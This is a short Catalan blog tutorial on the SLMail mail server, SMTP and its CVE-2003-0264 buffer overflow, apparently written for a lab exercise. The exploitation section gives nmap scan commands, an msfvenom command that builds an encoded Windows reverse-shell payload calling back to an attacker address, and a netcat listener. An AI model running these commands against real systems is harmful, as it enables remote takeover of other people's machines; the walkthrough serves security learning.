Què és SLmail?

Què és slmail?

L’article que us comparteixo avui no tan sols parla de la famosa vulnerabilitat CVE-2003-0264, desbordament de codi, sinó que també és interessant anar més enllà i conèixer alguna cosa sobre la història del SLMail i del SMTP.

Per Fernando Manrique

Què és slmail?

SLMail és SMTP i POP3, software de servidor de correu per a Microsoft™. Està desenvolupat per Seattle Lab, un servidor de correu electrònic per als sistemes operatius de Microsoft Windows NT versió 4.0 i 2000. Podríem descriure-ho com la “pedra angular per al desenvolupament d’una eficaç solució de correu electrònic”.

¿Qué es SLmail?

Què és SMTP?

SMTP, abreviatura de Simple Mail Transfer Protocol, és el protocol estàndard per a la transmissió de correu electrònic a la web. És el que els servidors de correu utilitzen per a enviar i rebre correus electrònics a Internet.

Es va establir l’any 1982, la qual cosa ho converteix en el port SMTP més antic. Es continua coneixent com el port SMTP estàndard i s’utilitza principalment per a la retransmissió SMTP.

¿Qué es SMTP?

Vulnerabilitat: CVE-2003-0264

(https://www.cvedetails.com/cve/CVE-2003-0264/)

  • Data de publicació: 2003-05-27. 
  • Última data d’actualització: 2021-02-24

Com explotar-la?

Primer hem de veure quins serveis estan corrent l’estat i la versió i per fer això utilitzarem nmap: suo nmap -sV [IP]

Vulnerabilidad: CVE-2003-0264

Com podem observar estan aixecats, en aquest cas, el port 25 amb SLMAIL SMTP i el port 110 SLMAIL pop3d. Ara que sabem l’estat i la versió de tots dos, podem tractar d’esbrinar les vulnerabilitats, fent ús del script vuln de nmap com es pot veure a continuació:

sudo nmap –script vuln [IP]

¿Qué es SLmail?

Podem veure que obtenim el cve que correspon a la vulnerabilitat sobre la qual podem constatar que el sistema és vulnerable a l’execució de codi remot, per mitjà d’un desbordament durant la canonicalización de la ruta.

Següents passos:

Buscarem un exploit per a la versió de SLMail detectada en exploit-*db i generarem la reverseShell a fi de poder prendre el control de la “màquina víctima”. Per fer això farem servir msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=[Ip atacante]LPORT=[puerto de escucha atacante] EXITFUNC=thread -a x86 –platform windows -b “\x00\x0a\x0d” -e x86/shikata_ga_nai -f python

Obtindrem la següent sortida:

¿Qué es SLmail?

Obtenint els caràcters necessaris sense salts de línia, necessaris per a la generació del exploit en el qual haurem d’afegir en el lloc que indica la següent imatge. Aquest buf no és més que una cadena amb un patró únic creat, el qual hem d’incorporar al script de python.

¿Qué es SLmail?

una vegada realitzat, aixequem el port d’escolta a través de la següent comanda:
sudo nc-nlvp [puerto de escucha]


i finalment executem el script amb python 2.7:

Una vegada més  I Love to be Chamaleon 😉, orgullós de ser “ambaixador” de Trentia.